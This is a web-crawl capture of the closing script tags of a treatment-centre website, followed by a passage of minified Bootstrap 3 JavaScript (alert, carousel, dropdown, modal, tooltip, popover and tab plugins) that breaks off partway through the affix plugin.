src='https://www.greenhousetreatment.com/wp-content/plugins/aacattribution/dist/sfvar.min.js?ver=1557525542'></script> <script type='text/javascript' src='https://www.greenhousetreatment.com/wp-content/plugins/aacattribution/dist/attr.min.js?ver=1557525542'></script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.js?ver=4.9.1'></script> <script type='text/javascript' src='https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/dist/js/global.min.js?ver=1557525542'></script> </body> </html>
0
/* * Bootstrap v3.3.5 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ /* * Generated using the Bootstrap Customizer (http://getbootstrap.com/customize/?id=3b9f225b6094148cb57d) * Config saved to config.json and https://gist.github.com/3b9f225b6094148cb57d */ if(typeof jQuery==="undefined"){throw new Error("Bootstrap's JavaScript requires jQuery")}+function(a){var b=a.fn.jquery.split(" ")[0].split(".");if((b[0]<2&&b[1]<9)||(b[0]==1&&b[1]==9&&b[2]<1)||(b[0]>2)){throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 3")}}(jQuery);+function(a){var c='[data-dismiss="alert"]';var b=function(f){a(f).on("click",c,this.close)};b.VERSION="3.3.6";b.TRANSITION_DURATION=150;b.prototype.close=function(h){var g=a(this);var j=g.attr("data-target");if(!j){j=g.attr("href");j=j&&j.replace(/.*(?=#[^\s]*$)/,"")}var f=a(j);if(h){h.preventDefault()}if(!f.length){f=g.closest(".alert")}f.trigger(h=a.Event("close.bs.alert"));if(h.isDefaultPrevented()){return}f.removeClass("in");function i(){f.detach().trigger("closed.bs.alert").remove()}a.support.transition&&f.hasClass("fade")?f.one("bsTransitionEnd",i).emulateTransitionEnd(b.TRANSITION_DURATION):i()};function e(f){return this.each(function(){var g=a(this);var h=g.data("bs.alert");if(!h){g.data("bs.alert",(h=new b(this)))}if(typeof f=="string"){h[f].call(g)}})}var d=a.fn.alert;a.fn.alert=e;a.fn.alert.Constructor=b;a.fn.alert.noConflict=function(){a.fn.alert=d;return this};a(document).on("click.bs.alert.data-api",c,b.prototype.close)}(jQuery);+function(a){var b=function(e,f){this.$element=a(e);this.options=a.extend({},b.DEFAULTS,f);this.isLoading=false};b.VERSION="3.3.6";b.DEFAULTS={loadingText:"loading..."};b.prototype.setState=function(h){var f="disabled";var e=this.$element;var i=e.is("input")?"val":"html";var g=e.data();h+="Text";if(g.resetText==null){e.data("resetText",e[i]())}setTimeout(a.proxy(function(){e[i](g[h]==null?this.options[h]:g[h]);if(h=="loadingText"){this.isLoading=true;e.addClass(f).attr(f,f)}else{if(this.isLoading){this.isLoading=false;e.removeClass(f).removeAttr(f)}}},this),0)};b.prototype.toggle=function(){var g=true;var f=this.$element.closest('[data-toggle="buttons"]');if(f.length){var e=this.$element.find("input");if(e.prop("type")=="radio"){if(e.prop("checked")){g=false}f.find(".active").removeClass("active");this.$element.addClass("active")}else{if(e.prop("type")=="checkbox"){if((e.prop("checked"))!==this.$element.hasClass("active")){g=false}this.$element.toggleClass("active")}}e.prop("checked",this.$element.hasClass("active"));if(g){e.trigger("change")}}else{this.$element.attr("aria-pressed",!this.$element.hasClass("active"));this.$element.toggleClass("active")}};function d(e){return this.each(function(){var f=a(this);var g=f.data("bs.button");var h=typeof e=="object"&&e;if(!g){f.data("bs.button",(g=new b(this,h)))}if(e=="toggle"){g.toggle()}else{if(e){g.setState(e)}}})}var c=a.fn.button;a.fn.button=d;a.fn.button.Constructor=b;a.fn.button.noConflict=function(){a.fn.button=c;return this};a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(g){var f=a(g.target);if(!f.hasClass("btn")){f=f.closest(".btn")}d.call(f,"toggle");if(!(a(g.target).is('input[type="radio"]')||a(g.target).is('input[type="checkbox"]'))){g.preventDefault()}}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(f){a(f.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(f.type))})}(jQuery);+function(a){var b=function(f,g){this.$element=a(f);this.$indicators=this.$element.find(".carousel-indicators");this.options=g;this.paused=null;this.sliding=null;this.interval=null;this.$active=null;this.$items=null;this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this));this.options.pause=="hover"&&!("ontouchstart" in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};b.VERSION="3.3.6";b.TRANSITION_DURATION=600;b.DEFAULTS={interval:5000,pause:"hover",wrap:true,keyboard:true};b.prototype.keydown=function(f){if(/input|textarea/i.test(f.target.tagName)){return}switch(f.which){case 37:this.prev();break;case 39:this.next();break;default:return}f.preventDefault()};b.prototype.cycle=function(f){f||(this.paused=false);this.interval&&clearInterval(this.interval);this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval));return this};b.prototype.getItemIndex=function(f){this.$items=f.parent().children(".item");return this.$items.index(f||this.$active)};b.prototype.getItemForDirection=function(i,f){var g=this.getItemIndex(f);var k=(i=="prev"&&g===0)||(i=="next"&&g==(this.$items.length-1));if(k&&!this.options.wrap){return f}var h=i=="prev"?-1:1;var j=(g+h)%this.$items.length;return this.$items.eq(j)};b.prototype.to=function(g){var h=this;var f=this.getItemIndex(this.$active=this.$element.find(".item.active"));if(g>(this.$items.length-1)||g<0){return}if(this.sliding){return this.$element.one("slid.bs.carousel",function(){h.to(g)})}if(f==g){return this.pause().cycle()}return this.slide(g>f?"next":"prev",this.$items.eq(g))};b.prototype.pause=function(f){f||(this.paused=true);if(this.$element.find(".next, .prev").length&&a.support.transition){this.$element.trigger(a.support.transition.end);this.cycle(true)}this.interval=clearInterval(this.interval);return this};b.prototype.next=function(){if(this.sliding){return}return this.slide("next")};b.prototype.prev=function(){if(this.sliding){return}return this.slide("prev")};b.prototype.slide=function(p,k){var f=this.$element.find(".item.active");var g=k||this.getItemForDirection(p,f);var j=this.interval;var i=p=="next"?"left":"right";var o=this;if(g.hasClass("active")){return(this.sliding=false)}var l=g[0];var m=a.Event("slide.bs.carousel",{relatedTarget:l,direction:i});this.$element.trigger(m);if(m.isDefaultPrevented()){return}this.sliding=true;j&&this.pause();if(this.$indicators.length){this.$indicators.find(".active").removeClass("active");var h=a(this.$indicators.children()[this.getItemIndex(g)]);h&&h.addClass("active")}var n=a.Event("slid.bs.carousel",{relatedTarget:l,direction:i});if(a.support.transition&&this.$element.hasClass("slide")){g.addClass(p);g[0].offsetWidth;f.addClass(i);g.addClass(i);f.one("bsTransitionEnd",function(){g.removeClass([p,i].join(" ")).addClass("active");f.removeClass(["active",i].join(" "));o.sliding=false;setTimeout(function(){o.$element.trigger(n)},0)}).emulateTransitionEnd(b.TRANSITION_DURATION)}else{f.removeClass("active");g.addClass("active");this.sliding=false;this.$element.trigger(n)}j&&this.cycle();return this};function e(f){return this.each(function(){var g=a(this);var i=g.data("bs.carousel");var j=a.extend({},b.DEFAULTS,g.data(),typeof f=="object"&&f);var h=typeof f=="string"?f:j.slide;if(!i){g.data("bs.carousel",(i=new b(this,j)))}if(typeof f=="number"){i.to(f)}else{if(h){i[h]()}else{if(j.interval){i.pause().cycle()}}}})}var d=a.fn.carousel;a.fn.carousel=e;a.fn.carousel.Constructor=b;a.fn.carousel.noConflict=function(){a.fn.carousel=d;return this};var c=function(h){var i;var g=a(this);var f=a(g.attr("data-target")||(i=g.attr("href"))&&i.replace(/.*(?=#[^\s]+$)/,""));if(!f.hasClass("carousel")){return}var j=a.extend({},f.data(),g.data());var k=g.attr("data-slide-to");if(k){j.interval=false}e.call(f,j);if(k){f.data("bs.carousel").to(k)}h.preventDefault()};a(document).on("click.bs.carousel.data-api","[data-slide]",c).on("click.bs.carousel.data-api","[data-slide-to]",c);a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var f=a(this);e.call(f,f.data())})})}(jQuery);+function(a){var b=".dropdown-backdrop";var h='[data-toggle="dropdown"]';var d=function(i){a(i).on("click.bs.dropdown",this.toggle)};d.VERSION="3.3.6";function e(j){var k=j.attr("data-target");if(!k){k=j.attr("href");k=k&&/#[A-Za-z]/.test(k)&&k.replace(/.*(?=#[^\s]*$)/,"")}var i=k&&a(k);return i&&i.length?i:j.parent()}function c(i){if(i&&i.which===3){return}a(b).remove();a(h).each(function(){var k=a(this);var j=e(k);var l={relatedTarget:this};if(!j.hasClass("open")){return}if(i&&i.type=="click"&&/input|textarea/i.test(i.target.tagName)&&a.contains(j[0],i.target)){return}j.trigger(i=a.Event("hide.bs.dropdown",l));if(i.isDefaultPrevented()){return}k.attr("aria-expanded","false");j.removeClass("open").trigger(a.Event("hidden.bs.dropdown",l))})}d.prototype.toggle=function(k){var j=a(this);if(j.is(".disabled, :disabled")){return}var i=e(j);var l=i.hasClass("open");c();if(!l){if("ontouchstart" in document.documentElement&&!i.closest(".navbar-nav").length){a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c)}var m={relatedTarget:this};i.trigger(k=a.Event("show.bs.dropdown",m));if(k.isDefaultPrevented()){return}j.trigger("focus").attr("aria-expanded","true");i.toggleClass("open").trigger(a.Event("shown.bs.dropdown",m))}return false};d.prototype.keydown=function(m){if(!/(38|40|27|32)/.test(m.which)||/input|textarea/i.test(m.target.tagName)){return}var k=a(this);m.preventDefault();m.stopPropagation();if(k.is(".disabled, :disabled")){return}var j=e(k);var o=j.hasClass("open");if(!o&&m.which!=27||o&&m.which==27){if(m.which==27){j.find(h).trigger("focus")}return k.trigger("click")}var l=" li:not(.disabled):visible a";var i=j.find(".dropdown-menu"+l);if(!i.length){return}var n=i.index(m.target);if(m.which==38&&n>0){n--}if(m.which==40&&n<i.length-1){n++}if(!~n){n=0}i.eq(n).trigger("focus")};function g(i){return this.each(function(){var j=a(this);var k=j.data("bs.dropdown");if(!k){j.data("bs.dropdown",(k=new d(this)))}if(typeof i=="string"){k[i].call(j)}})}var f=a.fn.dropdown;a.fn.dropdown=g;a.fn.dropdown.Constructor=d;a.fn.dropdown.noConflict=function(){a.fn.dropdown=f;return this};a(document).on("click.bs.dropdown.data-api",c).on("click.bs.dropdown.data-api",".dropdown form",function(i){i.stopPropagation()}).on("click.bs.dropdown.data-api",h,d.prototype.toggle).on("keydown.bs.dropdown.data-api",h,d.prototype.keydown).on("keydown.bs.dropdown.data-api",".dropdown-menu",d.prototype.keydown)}(jQuery);+function(a){var b=function(e,f){this.options=f;this.$body=a(document.body);this.$element=a(e);this.$dialog=this.$element.find(".modal-dialog");this.$backdrop=null;this.isShown=null;this.originalBodyPad=null;this.scrollbarWidth=0;this.ignoreBackdropClick=false;if(this.options.remote){this.$element.find(".modal-content").load(this.options.remote,a.proxy(function(){this.$element.trigger("loaded.bs.modal")},this))}};b.VERSION="3.3.6";b.TRANSITION_DURATION=300;b.BACKDROP_TRANSITION_DURATION=150;b.DEFAULTS={backdrop:true,keyboard:true,show:true};b.prototype.toggle=function(e){return this.isShown?this.hide():this.show(e)};b.prototype.show=function(f){var h=this;var g=a.Event("show.bs.modal",{relatedTarget:f});this.$element.trigger(g);if(this.isShown||g.isDefaultPrevented()){return}this.isShown=true;this.checkScrollbar();this.setScrollbar();this.$body.addClass("modal-open");this.escape();this.resize();this.$element.on("click.dismiss.bs.modal",'[data-dismiss="modal"]',a.proxy(this.hide,this));this.$dialog.on("mousedown.dismiss.bs.modal",function(){h.$element.one("mouseup.dismiss.bs.modal",function(i){if(a(i.target).is(h.$element)){h.ignoreBackdropClick=true}})});this.backdrop(function(){var j=a.support.transition&&h.$element.hasClass("fade");if(!h.$element.parent().length){h.$element.appendTo(h.$body)}h.$element.show().scrollTop(0);h.adjustDialog();if(j){h.$element[0].offsetWidth}h.$element.addClass("in");h.enforceFocus();var i=a.Event("shown.bs.modal",{relatedTarget:f});j?h.$dialog.one("bsTransitionEnd",function(){h.$element.trigger("focus").trigger(i)}).emulateTransitionEnd(b.TRANSITION_DURATION):h.$element.trigger("focus").trigger(i)})};b.prototype.hide=function(f){if(f){f.preventDefault()}f=a.Event("hide.bs.modal");this.$element.trigger(f);if(!this.isShown||f.isDefaultPrevented()){return}this.isShown=false;this.escape();this.resize();a(document).off("focusin.bs.modal");this.$element.removeClass("in").off("click.dismiss.bs.modal").off("mouseup.dismiss.bs.modal");this.$dialog.off("mousedown.dismiss.bs.modal");a.support.transition&&this.$element.hasClass("fade")?this.$element.one("bsTransitionEnd",a.proxy(this.hideModal,this)).emulateTransitionEnd(b.TRANSITION_DURATION):this.hideModal()};b.prototype.enforceFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(f){if(this.$element[0]!==f.target&&!this.$element.has(f.target).length){this.$element.trigger("focus")}},this))};b.prototype.escape=function(){if(this.isShown&&this.options.keyboard){this.$element.on("keydown.dismiss.bs.modal",a.proxy(function(f){f.which==27&&this.hide()},this))}else{if(!this.isShown){this.$element.off("keydown.dismiss.bs.modal")}}};b.prototype.resize=function(){if(this.isShown){a(window).on("resize.bs.modal",a.proxy(this.handleUpdate,this))}else{a(window).off("resize.bs.modal")}};b.prototype.hideModal=function(){var e=this;this.$element.hide();this.backdrop(function(){e.$body.removeClass("modal-open");e.resetAdjustments();e.resetScrollbar();e.$element.trigger("hidden.bs.modal")})};b.prototype.removeBackdrop=function(){this.$backdrop&&this.$backdrop.remove();this.$backdrop=null};b.prototype.backdrop=function(f){var i=this;var e=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var h=a.support.transition&&e;this.$backdrop=a(document.createElement("div")).addClass("modal-backdrop "+e).appendTo(this.$body);this.$element.on("click.dismiss.bs.modal",a.proxy(function(j){if(this.ignoreBackdropClick){this.ignoreBackdropClick=false;return}if(j.target!==j.currentTarget){return}this.options.backdrop=="static"?this.$element[0].focus():this.hide()},this));if(h){this.$backdrop[0].offsetWidth}this.$backdrop.addClass("in");if(!f){return}h?this.$backdrop.one("bsTransitionEnd",f).emulateTransitionEnd(b.BACKDROP_TRANSITION_DURATION):f()}else{if(!this.isShown&&this.$backdrop){this.$backdrop.removeClass("in");var g=function(){i.removeBackdrop();f&&f()};a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one("bsTransitionEnd",g).emulateTransitionEnd(b.BACKDROP_TRANSITION_DURATION):g()}else{if(f){f()}}}};b.prototype.handleUpdate=function(){this.adjustDialog()};b.prototype.adjustDialog=function(){var e=this.$element[0].scrollHeight>document.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&e?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!e?this.scrollbarWidth:""})};b.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})};b.prototype.checkScrollbar=function(){var f=window.innerWidth;if(!f){var e=document.documentElement.getBoundingClientRect();f=e.right-Math.abs(e.left)}this.bodyIsOverflowing=document.body.clientWidth<f;this.scrollbarWidth=this.measureScrollbar()};b.prototype.setScrollbar=function(){var e=parseInt((this.$body.css("padding-right")||0),10);this.originalBodyPad=document.body.style.paddingRight||"";if(this.bodyIsOverflowing){this.$body.css("padding-right",e+this.scrollbarWidth)}};b.prototype.resetScrollbar=function(){this.$body.css("padding-right",this.originalBodyPad)};b.prototype.measureScrollbar=function(){var f=document.createElement("div");f.className="modal-scrollbar-measure";this.$body.append(f);var e=f.offsetWidth-f.clientWidth;this.$body[0].removeChild(f);return e};function d(f,e){return this.each(function(){var g=a(this);var h=g.data("bs.modal");var i=a.extend({},b.DEFAULTS,g.data(),typeof f=="object"&&f);if(!h){g.data("bs.modal",(h=new b(this,i)))}if(typeof f=="string"){h[f](e)}else{if(i.show){h.show(e)}}})}var c=a.fn.modal;a.fn.modal=d;a.fn.modal.Constructor=b;a.fn.modal.noConflict=function(){a.fn.modal=c;return this};a(document).on("click.bs.modal.data-api",'[data-toggle="modal"]',function(h){var g=a(this);var i=g.attr("href");var f=a(g.attr("data-target")||(i&&i.replace(/.*(?=#[^\s]+$)/,"")));var j=f.data("bs.modal")?"toggle":a.extend({remote:!/#/.test(i)&&i},f.data(),g.data());if(g.is("a")){h.preventDefault()}f.one("show.bs.modal",function(e){if(e.isDefaultPrevented()){return}f.one("hidden.bs.modal",function(){g.is(":visible")&&g.trigger("focus")})});d.call(f,j,this)})}(jQuery);+function(a){var d=function(e,f){this.type=null;this.options=null;this.enabled=null;this.timeout=null;this.hoverState=null;this.$element=null;this.inState=null;this.init("tooltip",e,f)};d.VERSION="3.3.6";d.TRANSITION_DURATION=150;d.DEFAULTS={animation:true,placement:"top",selector:false,template:'<div class="tooltip" role="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:false,container:false,viewport:{selector:"body",padding:0}};d.prototype.init=function(m,e,j){this.enabled=true;this.type=m;this.$element=a(e);this.options=this.getOptions(j);this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):(this.options.viewport.selector||this.options.viewport));this.inState={click:false,hover:false,focus:false};if(this.$element[0] instanceof document.constructor&&!this.options.selector){throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!")}var l=this.options.trigger.split(" ");for(var h=l.length;h--;){var k=l[h];if(k=="click"){this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this))}else{if(k!="manual"){var f=k=="hover"?"mouseenter":"focusin";var g=k=="hover"?"mouseleave":"focusout";this.$element.on(f+"."+this.type,this.options.selector,a.proxy(this.enter,this));this.$element.on(g+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}}this.options.selector?(this._options=a.extend({},this.options,{trigger:"manual",selector:""})):this.fixTitle()};d.prototype.getDefaults=function(){return d.DEFAULTS};d.prototype.getOptions=function(e){e=a.extend({},this.getDefaults(),this.$element.data(),e);if(e.delay&&typeof e.delay=="number"){e.delay={show:e.delay,hide:e.delay}}return e};d.prototype.getDelegateOptions=function(){var f={};var e=this.getDefaults();this._options&&a.each(this._options,function(g,h){if(e[g]!=h){f[g]=h}});return f};d.prototype.enter=function(e){var f=e instanceof this.constructor?e:a(e.currentTarget).data("bs."+this.type);if(!f){f=new this.constructor(e.currentTarget,this.getDelegateOptions());a(e.currentTarget).data("bs."+this.type,f)}if(e instanceof a.Event){f.inState[e.type=="focusin"?"focus":"hover"]=true}if(f.tip().hasClass("in")||f.hoverState=="in"){f.hoverState="in";return}clearTimeout(f.timeout);f.hoverState="in";if(!f.options.delay||!f.options.delay.show){return f.show()}f.timeout=setTimeout(function(){if(f.hoverState=="in"){f.show()}},f.options.delay.show)};d.prototype.isInStateTrue=function(){for(var e in this.inState){if(this.inState[e]){return true}}return false};d.prototype.leave=function(e){var f=e instanceof this.constructor?e:a(e.currentTarget).data("bs."+this.type);if(!f){f=new this.constructor(e.currentTarget,this.getDelegateOptions());a(e.currentTarget).data("bs."+this.type,f)}if(e instanceof a.Event){f.inState[e.type=="focusout"?"focus":"hover"]=false}if(f.isInStateTrue()){return}clearTimeout(f.timeout);f.hoverState="out";if(!f.options.delay||!f.options.delay.hide){return f.hide()}f.timeout=setTimeout(function(){if(f.hoverState=="out"){f.hide()}},f.options.delay.hide)};d.prototype.show=function(){var m=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(m);var n=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(m.isDefaultPrevented()||!n){return}var r=this;var f=this.tip();var s=this.getUID(this.type);this.setContent();f.attr("id",s);this.$element.attr("aria-describedby",s);if(this.options.animation){f.addClass("fade")}var p=typeof this.options.placement=="function"?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement;var j=/\s?auto?\s?/i;var i=j.test(p);if(i){p=p.replace(j,"")||"top"}f.detach().css({top:0,left:0,display:"block"}).addClass(p).data("bs."+this.type,this);this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element);this.$element.trigger("inserted.bs."+this.type);var q=this.getPosition();var h=f[0].offsetWidth;var g=f[0].offsetHeight;if(i){var o=p;var t=this.getPosition(this.$viewport);p=p=="bottom"&&q.bottom+g>t.bottom?"top":p=="top"&&q.top-g<t.top?"bottom":p=="right"&&q.right+h>t.width?"left":p=="left"&&q.left-h<t.left?"right":p;f.removeClass(o).addClass(p)}var k=this.getCalculatedOffset(p,q,h,g);this.applyPlacement(k,p);var l=function(){var e=r.hoverState;r.$element.trigger("shown.bs."+r.type);r.hoverState=null;if(e=="out"){r.leave(r)}};a.support.transition&&this.$tip.hasClass("fade")?f.one("bsTransitionEnd",l).emulateTransitionEnd(d.TRANSITION_DURATION):l()}};d.prototype.applyPlacement=function(o,p){var e=this.tip();var q=e[0].offsetWidth;var k=e[0].offsetHeight;var n=parseInt(e.css("margin-top"),10);var m=parseInt(e.css("margin-left"),10);if(isNaN(n)){n=0}if(isNaN(m)){m=0}o.top+=n;o.left+=m;a.offset.setOffset(e[0],a.extend({using:function(r){e.css({top:Math.round(r.top),left:Math.round(r.left)})}},o),0);e.addClass("in");var g=e[0].offsetWidth;var f=e[0].offsetHeight;if(p=="top"&&f!=k){o.top=o.top+k-f}var j=this.getViewportAdjustedDelta(p,o,g,f);if(j.left){o.left+=j.left}else{o.top+=j.top}var l=/top|bottom/.test(p);var h=l?j.left*2-q+g:j.top*2-k+f;var i=l?"offsetWidth":"offsetHeight";e.offset(o);this.replaceArrow(h,e[0][i],l)};d.prototype.replaceArrow=function(e,f,g){this.arrow().css(g?"left":"top",50*(1-e/f)+"%").css(g?"top":"left","")};d.prototype.setContent=function(){var e=this.tip();var f=this.getTitle();e.find(".tooltip-inner")[this.options.html?"html":"text"](f);e.removeClass("fade in top bottom left right")};d.prototype.hide=function(g){var j=this;var f=a(this.$tip);var i=a.Event("hide.bs."+this.type);function h(){if(j.hoverState!="in"){f.detach()}j.$element.removeAttr("aria-describedby").trigger("hidden.bs."+j.type);g&&g()}this.$element.trigger(i);if(i.isDefaultPrevented()){return}f.removeClass("in");a.support.transition&&f.hasClass("fade")?f.one("bsTransitionEnd",h).emulateTransitionEnd(d.TRANSITION_DURATION):h();this.hoverState=null;return this};d.prototype.fixTitle=function(){var e=this.$element;if(e.attr("title")||typeof e.attr("data-original-title")!="string"){e.attr("data-original-title",e.attr("title")||"").attr("title","")}};d.prototype.hasContent=function(){return this.getTitle()};d.prototype.getPosition=function(e){e=e||this.$element;var f=e[0];var i=f.tagName=="BODY";var h=f.getBoundingClientRect();if(h.width==null){h=a.extend({},h,{width:h.right-h.left,height:h.bottom-h.top})}var g=i?{top:0,left:0}:e.offset();var k={scroll:i?document.documentElement.scrollTop||document.body.scrollTop:e.scrollTop()};var j=i?{width:a(window).width(),height:a(window).height()}:null;return a.extend({},h,k,j,g)};d.prototype.getCalculatedOffset=function(g,h,f,e){return g=="bottom"?{top:h.top+h.height,left:h.left+h.width/2-f/2}:g=="top"?{top:h.top-e,left:h.left+h.width/2-f/2}:g=="left"?{top:h.top+h.height/2-e/2,left:h.left-f}:{top:h.top+h.height/2-e/2,left:h.left+h.width}};d.prototype.getViewportAdjustedDelta=function(j,k,f,e){var h={top:0,left:0};if(!this.$viewport){return h}var o=this.options.viewport&&this.options.viewport.padding||0;var n=this.getPosition(this.$viewport);if(/right|left/.test(j)){var m=k.top-o-n.scroll;var g=k.top+o-n.scroll+e;if(m<n.top){h.top=n.top-m}else{if(g>n.top+n.height){h.top=n.top+n.height-g}}}else{var i=k.left-o;var l=k.left+o+f;if(i<n.left){h.left=n.left-i}else{if(l>n.right){h.left=n.left+n.width-l}}}return h};d.prototype.getTitle=function(){var g;var e=this.$element;var f=this.options;g=e.attr("data-original-title")||(typeof f.title=="function"?f.title.call(e[0]):f.title);return g};d.prototype.getUID=function(e){do{e+=~~(Math.random()*1000000)}while(document.getElementById(e));return e};d.prototype.tip=function(){if(!this.$tip){this.$tip=a(this.options.template);if(this.$tip.length!=1){throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!")}}return this.$tip};d.prototype.arrow=function(){return(this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow"))};d.prototype.enable=function(){this.enabled=true};d.prototype.disable=function(){this.enabled=false};d.prototype.toggleEnabled=function(){this.enabled=!this.enabled};d.prototype.toggle=function(f){var g=this;if(f){g=a(f.currentTarget).data("bs."+this.type);if(!g){g=new this.constructor(f.currentTarget,this.getDelegateOptions());a(f.currentTarget).data("bs."+this.type,g)}}if(f){g.inState.click=!g.inState.click;if(g.isInStateTrue()){g.enter(g)}else{g.leave(g)}}else{g.tip().hasClass("in")?g.leave(g):g.enter(g)}};d.prototype.destroy=function(){var e=this;clearTimeout(this.timeout);this.hide(function(){e.$element.off("."+e.type).removeData("bs."+e.type);if(e.$tip){e.$tip.detach()}e.$tip=null;e.$arrow=null;e.$viewport=null})};function c(e){return this.each(function(){var f=a(this);var g=f.data("bs.tooltip");var h=typeof e=="object"&&e;if(!g&&/destroy|hide/.test(e)){return}if(!g){f.data("bs.tooltip",(g=new d(this,h)))}if(typeof e=="string"){g[e]()}})}var b=a.fn.tooltip;a.fn.tooltip=c;a.fn.tooltip.Constructor=d;a.fn.tooltip.noConflict=function(){a.fn.tooltip=b;return this}}(jQuery);+function(a){var d=function(e,f){this.init("popover",e,f)};if(!a.fn.tooltip){throw new Error("Popover requires tooltip.js")}d.VERSION="3.3.6";d.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:'<div class="popover" role="tooltip"><div class="arrow"></div><h3 class="popover-title"></h3><div class="popover-content"></div></div>'});d.prototype=a.extend({},a.fn.tooltip.Constructor.prototype);d.prototype.constructor=d;d.prototype.getDefaults=function(){return d.DEFAULTS};d.prototype.setContent=function(){var e=this.tip();var g=this.getTitle();var f=this.getContent();e.find(".popover-title")[this.options.html?"html":"text"](g);e.find(".popover-content").children().detach().end()[this.options.html?(typeof f=="string"?"html":"append"):"text"](f);e.removeClass("fade top bottom left right in");if(!e.find(".popover-title").html()){e.find(".popover-title").hide()}};d.prototype.hasContent=function(){return this.getTitle()||this.getContent()};d.prototype.getContent=function(){var e=this.$element;var f=this.options;return e.attr("data-content")||(typeof f.content=="function"?f.content.call(e[0]):f.content)};d.prototype.arrow=function(){return(this.$arrow=this.$arrow||this.tip().find(".arrow"))};function c(e){return this.each(function(){var f=a(this);var g=f.data("bs.popover");var h=typeof e=="object"&&e;if(!g&&/destroy|hide/.test(e)){return}if(!g){f.data("bs.popover",(g=new d(this,h)))}if(typeof e=="string"){g[e]()}})}var b=a.fn.popover;a.fn.popover=c;a.fn.popover.Constructor=d;a.fn.popover.noConflict=function(){a.fn.popover=b;return this}}(jQuery);+function(a){var e=function(f){this.element=a(f)};e.VERSION="3.3.6";e.TRANSITION_DURATION=150;e.prototype.show=function(){var h=this.element;var i=h.closest("ul:not(.dropdown-menu)");var k=h.data("target");if(!k){k=h.attr("href");k=k&&k.replace(/.*(?=#[^\s]*$)/,"")}if(h.parent("li").hasClass("active")){return}var f=i.find(".active:last a");var j=a.Event("hide.bs.tab",{relatedTarget:h[0]});var l=a.Event("show.bs.tab",{relatedTarget:f[0]});f.trigger(j);h.trigger(l);if(l.isDefaultPrevented()||j.isDefaultPrevented()){return}var g=a(k);this.activate(h.closest("li"),i);this.activate(g,g.parent(),function(){f.trigger({type:"hidden.bs.tab",relatedTarget:h[0]});h.trigger({type:"shown.bs.tab",relatedTarget:f[0]})})};e.prototype.activate=function(i,h,g){var f=h.find("> .active");var k=g&&a.support.transition&&(f.length&&f.hasClass("fade")||!!h.find("> .fade").length);function j(){f.removeClass("active").find("> .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",false);i.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",true);if(k){i[0].offsetWidth;i.addClass("in")}else{i.removeClass("fade")}if(i.parent(".dropdown-menu").length){i.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",true)}g&&g()}f.length&&k?f.one("bsTransitionEnd",j).emulateTransitionEnd(e.TRANSITION_DURATION):j();f.removeClass("in")};function d(f){return this.each(function(){var g=a(this);var h=g.data("bs.tab");if(!h){g.data("bs.tab",(h=new e(this)))}if(typeof f=="string"){h[f]()}})}var c=a.fn.tab;a.fn.tab=d;a.fn.tab.Constructor=e;a.fn.tab.noConflict=function(){a.fn.tab=c;return this};var b=function(f){f.preventDefault();d.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',b).on("click.bs.tab.data-api",'[data-toggle="pill"]',b)}(jQuery);+function(a){var b=function(e,f){this.options=a.extend({},b.DEFAULTS,f);this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this));this.$element=a(e);this.affixed=null;this.unpin=null;this.pinnedOffset=null;this.checkPosition()};b.VERSION="3.3.6";b.RESET="affix affix-top affix-bottom";b.DEFAULTS={offset:0,target:window};b.prototype.getState=function(l,g,j,i){var m=this.$target.scrollTop();var k=this.$element.offset();var n=this.$target.height();if(j!=null&&this.affixed=="top"){return m<j?"top":false}if(this.affixed=="bottom"){if(j!=null){return(m+this.unpin<=k.top)?false:"bottom"}return(m+n<=l-i)?false:"bottom"}var h=this.affixed==null;var f=h?m:k.top;var e=h?n:g;if(j!=null&&m<=j){return"top"}if(i!=null&&(f+e>=l-i)){return"bottom"}return false};b.prototype.getPinnedOffset=function(){if(this.pinnedOffset){return this.pinnedOffset}this.$element.removeClass(b.RESET).addClass("affix");var f=this.$target.scrollTop();var 